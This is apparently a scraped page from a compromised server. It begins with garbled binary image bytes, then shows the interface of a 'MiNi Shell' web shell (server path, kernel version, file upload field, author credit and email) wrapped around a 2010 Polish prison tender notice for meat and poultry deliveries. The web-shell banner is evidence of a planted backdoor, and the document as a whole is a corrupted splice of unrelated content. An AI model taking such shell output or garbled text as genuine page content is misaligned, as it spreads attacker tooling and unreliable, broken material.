JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100524/140692-N-2010.html

<p class="kh_header"><b>Wałbrzych: OGŁOSZENIE NA DOSTAWĘ MIĘSA I WĘDLIN</b><br>
<b>Numer ogłoszenia: 140692 - 2010; data zamieszczenia: 24.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Wałbrzychu , ul. Juliusza Słowackiego 10 A, 58-300 Wałbrzych, woj. dolnośląskie, tel. 0-74 8877000, faks 0-74 8877002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OGŁOSZENIE NA DOSTAWĘ MIĘSA I WĘDLIN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Pierwsza część oferty:
Lp.	Nazwa artykułu	Szacunkowa ilość w kg*	Kod CPV	Cechy produktu
1.	BLOK MIĘSNY lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
2.	KIEŁBASA KANAPKOWA lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
3.	KASZANKA lub równoważny	1000	15131134-3	-------------------------------------
4.	KIEŁBASA BIAŁA PARZONA lub równoważny	100	15131130-5	Wędlina z mięsem wołowym i/lub wieprzowym - parzona
5.	KIEŁBASA CODZIENNA lub równoważny	2000	15131130-5	Wędlina z mięsem wołowym i/lub wieprzowym
6.	LANSZMIDT lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
7.	METKA ŁOSOSIOWA (wieprzowa) lub równoważny	700	15131400-9	Mięso wieprzowe - drobno zmielone z przyprawami (do smarowania)
8.	MIELONKA KONSERWOWA lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
9.	MIELONKA POZNAŃSKA lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
10.	MIELONKA TYROLSKA lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
11.	MORTADELA lub równoważny	1200	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
12.	MORTADELA PIZZA lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
13.	PARÓWKI lub równoważny	1200	15131130-5	Wędlina zmielona z mięsem wołowym i/lub wieprzowym
14.	PASTA Z BOCZKU lub równoważny	700	15131400-9	Boczek mielony - drobno zmielony z przyprawami (do smarowania)
15.	PASZTETOWA lub równoważny	700	15131310-1	Pasztet gruby z mięsa wołowego i/lub wieprzowego
16.	PIECZEŃ RZYMSKA lub równoważny	700	15131130-5	Pieczeń z mięsem wołowym i/lub wieprzowym
17.	PIECZEŃ WESELNA lub równoważny	700	15131130-5	Pieczeń z mięsem wołowym i/lub wieprzowym
18.	PIECZEŃ SZYNKOWA lub równoważny	700	15131130-5	Pieczeń z mięsem wołowym i/lub wieprzowym
19.	SALCESON CZARNY lub równoważny	700	15131134-3	Salceson gruby z dodatkiem krwi - salceson nie może posiadać kości
20.	SZYNKA MIELONA lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
21.	SZYNKA MOZAIKOWA lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
22.	SZYNKA ŚNIADANIOWA lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
23.	WĄTRÓBKA WIEPRZOWA lub równoważny	1200	15114000-0	Wątroba wieprzowa tylko świeża, nie dopuszcza się produktów mrożonych
24.	KIEŁBASA PIWNA lub równoważny	700	15131130-5	Wędlina gruba z mięsem wołowym i/lub wieprzowym
25.	PASZTET PIECZARKOWY lub równoważny	700	15131310-1	Pasztet gruby z mięsa wołowego i/lub wieprzowego o smaku pieczarkowym
26.	MIESO MIELONE	1500	15110000-2	Mięso mielone wieprzowe świeże bez żadnych przypraw, nie dopuszcza się produktów mrożonych
*Podane ilości są ilościami szacunkowymi uwzględniające maksymalne zaludnienie jednostki, dlatego też ze względu na różne zaludnienie jednostki ilości mogą ulec zmianie. Z tego tytułu Dostawcy nie będą przysługiwały żadne roszczenia wobec Odbiorcy.

2.	Druga część oferty:
Lp.	Nazwa artykułu	Szacunkowa ilość w kg*	Kod CPV	Cechy produktu
1	SZYNKA MIELONA Z INDYKA lub równoważny	700	15131135-0	Wędlina gruba z dodatkiem mięsa z indyka
2	ĆWIARTKA Z KURCZAKA	1800	15112200-8	Ćwiartki z kurczaka, tylko świeże, nie dopuszcza się produktów mrożonych
3	KIEŁBASA ŚLĄSKA DROBIOWA lub równoważny	2000	15131135-0	Wędlina z dodatkiem mięsa drobiowego
4	MIĘSO MIELONE INDYCZE	1200	15112200-8	Mięso mielone tylko indycze, świeże, nie dopuszcza się produktów mrożonych bez żadnych przypraw
5	PASZTET DOMOWY INDYCZY lub równoważny	700	15131310-1	Pasztet gruby z dodatkiem mięsa drobiowego
6	PORCJE ROSOŁOWE	2500	15112200-8	Korpusy z kurczaków bez skrzydeł, tylko świeże, nie dopuszcza się produktów mrożonych
7	SERCA KURZE	600	15114000-0	Serca z kur, tylko świeże, nie dopuszcza się produktów mrożonych
8	SZYNKA DROBIOWA lub równoważny	700	15131135-0	Wędlina gruba z dodatkiem mięsa drobiowego
9	MOZAIKA DROBIOWA lub równoważny	700	15131135-0	Wędlina gruba z dodatkiem mięsa drobiowego
10	ŻOŁADKI Z KURCZAKA	1000	15114000-0	Żołądki z kurczaka, tylko świeże, nie dopuszcza się produktów mrożonych
*Podane ilości są ilościami szacunkowymi uwzględniające maksymalne zaludnienie jednostki, dlatego też ze względu na różne zaludnienie jednostki ilości mogą ulec zmianie. Z tego tytułu Dostawcy nie będą przysługiwały żadne roszczenia wobec Odbiorcy.
* Wszystkie artykuły z pierwszej i drugiej części zamówienia muszą być świeże, nie dopuszcza się produktów mrożonych, termin przydatności do spożycia wędlin min. 10 dni od daty dostawy. Średnica dla wszystkich grubych wędlin oraz pasztetów to minimum 5 centymetrów.  

1)	Ilość i termin dostawy:
Dostawa towaru odbywać się będzie w dni wyznaczone przez Odbiorcę przy złożeniu zamówienia telefonicznie podając ilości i rodzaje artykułów. Odbiorca składa do godz. 1400 zamówienie telefoniczne, podając ilość i rodzaj asortymentu, termin realizacji dzień następny do godz. 1000. Jednorazowe zapotrzebowanie zgłaszane Dostawcy nie musi obejmować wszystkich pozycji występujących w formularzu oferty.
2)	Miejsce i czas dostawy: 
Areszt Śledczy w Wałbrzychu ul Słowackiego 10a, 58-300 Wałbrzych. Dostawa powinna odbywać się w godzinach od 7.30 do 10.00 w dni wyznaczone przez Odbiorcę przy złożeniu zamówienia. 
3)	Warunki dostarczenia towaru:
Transportem Dostawcy i na jego koszt. Pojazdy do przewozu artykułów żywnościowych muszą spełniać wymagania określone w Rozporządzenia (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych.
4)	Wymagania jakościowe: Artykuły bez oznak zachodzących niekorzystnych zmian biochemicznych i mikrobiologicznych, brak ubytków i uszkodzeń mechanicznych. Opakowanie powinno spełniać wszystkie normy sanitarne wymagane przez Rozporządzenie Komisji (WE) nr 450/2009 z dnia 29 maja 2009 r. w sprawie aktywnych i inteligentnych materiałów i wyrobów przeznaczonych do kontaktu z żywnością.
5)	Odbiór jakościowy - wydanie produktu musi być poprzedzone kontrolą jakościową , którą przeprowadzą przedstawiciele odbiorcy w obecności Dostawcy. Wydanie produktów następować będzie obok magazynu żywnościowego Odbiorcy. Samochód dostawczy ma obowiązek wjechać na teren Aresztu. Jeżeli samochód nie jest w stanie wjechać na teren jednostki dostawę traktujemy jako nienależycie wykonanie umowy. Prześwit bramy wjazdowej to: szerokość 3,20m wysokość 3,30m.
6)	Warunki płatności - płatność przelewem na konto Dostawcy w terminie 30 dni od daty otrzymania faktury..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.40.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O wykonanie zamówienia ubiegać się mogą wykonawcy spełniający warunki art. 22 ust. 1 i nie podlegają wykluczeniu zgodnie z art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych. Ocena spełnienia wymaganych wa?runków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie: (spełnia - nie spełnia) w oparciu o informacje zawarte:
a)	oświadczenie o spełnieniu warunków oraz nie podleganiu wykluczeniu zgodnie z załączonym wzorem oświadczenia (Załącznik nr 2) na podstawie ustawy Prawo za?mó?wień publicznych, 
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o  wpisie do ewiden?cji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c)	wypełniony wzór oferty (Załącznik nr 1do SIWZ),
d)	podpisany wzór umowy (Załącznik nr 3do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.sw.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2010 godzina 10:00, miejsce: Areszt Śledczy w Wałbrzychu
ul. Słowackiego 10a
58-300 Wałbrzych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com